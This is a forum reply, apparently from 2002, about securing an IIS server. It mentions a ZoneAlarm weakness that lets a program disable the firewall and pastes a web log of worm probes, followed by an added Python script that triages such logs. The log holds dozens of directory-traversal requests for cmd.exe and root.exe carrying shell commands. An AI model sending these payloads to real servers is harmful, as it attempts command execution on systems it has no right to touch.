Originally posted by: BZ
And does anyone know if either of them are really any good? I run IIS so I feel pretty vulnerable
I use ZA 3.5.169.002, it is decent, although there is a known hole where if you don't password protect it (pretty damn inconvenient if you do!), a program can temporarily turn your firewall off by pretty much following the uninstall instructions and blocking a confirmation dialog from popping up!! AFAIK there are no plans to fix this!
It will NOT protect you from a worm attack that looks like this in my weblogs about once a day (sometimes more):
2002-12-29 09:43:27 207.6.75.122 - 192.168.123.163 80 GET /MSADC/root.exe /c+dir 403 -
2002-12-29 09:43:28 207.6.75.122 - 192.168.123.163 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:28 207.6.75.122 - 192.168.123.163 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:30 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:30 207.6.75.122 - 192.168.123.163 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:31 207.6.75.122 - 192.168.123.163 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:31 207.6.75.122 - 192.168.123.163 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-12-29 09:43:32 207.6.75.122 - 192.168.123.163 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:32 207.6.75.122 - 192.168.123.163 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:33 207.6.75.122 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:33 207.6.75.122 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 09:43:35 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:35 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:35 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 09:43:35 207.6.75.122 - 192.168.123.163 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:34 207.41.77.161 - 192.168.123.163 80 GET /scripts/root.exe /c+dir 404 -
2002-12-29 19:03:36 207.41.77.161 - 192.168.123.163 80 GET /MSADC/root.exe /c+dir 403 -
2002-12-29 19:03:37 207.41.77.161 - 192.168.123.163 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:39 207.41.77.161 - 192.168.123.163 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:40 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:40 207.41.77.161 - 192.168.123.163 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:42 207.41.77.161 - 192.168.123.163 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:43 207.41.77.161 - 192.168.123.163 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-12-29 19:03:44 207.41.77.161 - 192.168.123.163 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:44 207.41.77.161 - 192.168.123.163 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:46 207.41.77.161 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:47 207.41.77.161 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 19:03:48 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:48 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:49 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:03:49 207.41.77.161 - 192.168.123.163 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:44:04 203.167.91.242 - 192.168.123.163 80 GET / - 400 -
2002-12-29 20:17:28 207.41.77.182 - 192.168.123.163 80 GET /scripts/root.exe /c+dir 404 -
2002-12-29 20:17:30 207.41.77.182 - 192.168.123.163 80 GET /MSADC/root.exe /c+dir 403 -
2002-12-29 20:17:31 207.41.77.182 - 192.168.123.163 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:32 207.41.77.182 - 192.168.123.163 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:34 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:34 207.41.77.182 - 192.168.123.163 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:36 207.41.77.182 - 192.168.123.163 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:37 207.41.77.182 - 192.168.123.163 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-12-29 20:17:39 207.41.77.182 - 192.168.123.163 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:39 207.41.77.182 - 192.168.123.163 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:40 207.41.77.182 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:42 207.41.77.182 - 192.168.123.163 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-12-29 20:17:43 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:43 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:45 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 20:17:45 207.41.77.182 - 192.168.123.163 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 23:33:35 62.3.27.71 - 192.168.123.163 80 HEAD /iisstart.asp - 500 -
2002-12-29 23:33:36 62.3.27.71 - 192.168.123.163 80 HEAD /script/winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:37 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:39 62.3.27.71 - 192.168.123.163 80 HEAD /win2000/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:40 62.3.27.71 - 192.168.123.163 80 HEAD /windows/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:42 62.3.27.71 - 192.168.123.163 80 HEAD /script/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:43 62.3.27.71 - 192.168.123.163 80 HEAD /script/.._../.._../.._../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:33:44 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:33:46 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:47 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:48 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:50 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:51 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:52 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:57 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:33:58 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:00 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:01 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..À/..À/..À/winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:02 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:04 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:05 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:06 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:08 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:09 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:11 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:12 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:13 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:15 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á..Á..Á..Á../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 500 -
2002-12-29 23:34:16 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:18 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 500 -
2002-12-29 23:34:19 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:20 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 500 -
2002-12-29 23:34:22 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:23 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:24 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:26 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:27 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:28 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/.._../.._../.._../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:30 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/.._../winnt/system32/cmd.exe /c+dir?/c+dir+c:\ 404 -
2002-12-29 23:34:31 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:33 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-12-29 23:34:34 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:35 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:37 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:38 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/..ü????¯../winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-12-29 23:34:39 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/check.bat/..À/..À/..À/winnt/system32/cmd.exe /c%20dir%20C:\?/c+dir+c:\ 404 -
2002-12-29 23:34:41 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c%20dir%20C:\?/c+dir+c:\ 404 -
2002-12-29 23:34:42 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/check.bat/..Á..Á..Áwinnt/system32/cmd.exe /c%20dir%20C:\?/c+dir+c:\ 404 -
2002-12-29 23:34:44 62.3.27.71 - 192.168.123.163 80 HEAD /winnt/system32/cmd.exe /c%20dir%20C:\?/c+dir+c:\ 404 -
2002-12-29 23:34:45 62.3.27.71 - 192.168.123.163 80 HEAD /scripts/root.exe /c+dir+c:\ 404 -
For IIS to be semi-secure, you need to get rid of all the standard administrative directories that are installed by default. Any result code (2nd to last column, followed by a - in the log above) less than 400 in response to those attacks is cause for concern.
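Added example, not part of the original post: a small Python triage script for a log in the field layout shown above. It groups requests for cmd.exe or root.exe by client address and flags any that were answered with a result code below 400. The sample lines, the client addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the field layout of the log above:
# date time client-ip user server-ip port method uri-stem uri-query status trailer
# Client addresses are documentation-range placeholders; the 200 responses are
# invented to show what a successful probe and a normal request look like.
SAMPLE_LOG = """\
2002-12-29 09:43:27 198.51.100.7 - 192.168.123.163 80 GET /MSADC/root.exe /c+dir 403 -
2002-12-29 09:43:30 198.51.100.7 - 192.168.123.163 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-12-29 19:44:04 203.0.113.9 - 192.168.123.163 80 GET / - 400 -
2002-12-29 20:17:28 203.0.113.50 - 192.168.123.163 80 GET /scripts/root.exe /c+dir 200 -
2002-12-29 20:18:02 203.0.113.77 - 192.168.123.163 80 GET /default.htm - 200 -
"""

# Requests for the command interpreter or the root.exe copy seen in the log.
PROBE = re.compile(r"(?:cmd|root)\.exe", re.IGNORECASE)

def parse_line(line):
    """Split one log line into named fields; return None if it does not fit."""
    parts = line.split()
    if len(parts) != 11 or not parts[9].isdigit():
        return None
    return {"when": parts[0] + " " + parts[1], "client": parts[2],
            "method": parts[6], "stem": parts[7], "status": int(parts[9])}

def triage(log_text):
    """Group probe requests by client; collect those answered with a status < 400."""
    report = defaultdict(lambda: {"probes": 0, "concern": []})
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or not PROBE.search(entry["stem"]):
            continue
        bucket = report[entry["client"]]
        bucket["probes"] += 1
        if entry["status"] < 400:
            bucket["concern"].append(entry)
    return dict(report)

if __name__ == "__main__":
    for client, info in sorted(triage(SAMPLE_LOG).items()):
        flag = "INVESTIGATE" if info["concern"] else "blocked"
        print(f"{client}: {info['probes']} probe(s), {flag}")
        for e in info["concern"]:
            print(f"  {e['when']} {e['method']} {e['stem']} -> {e['status']}")
```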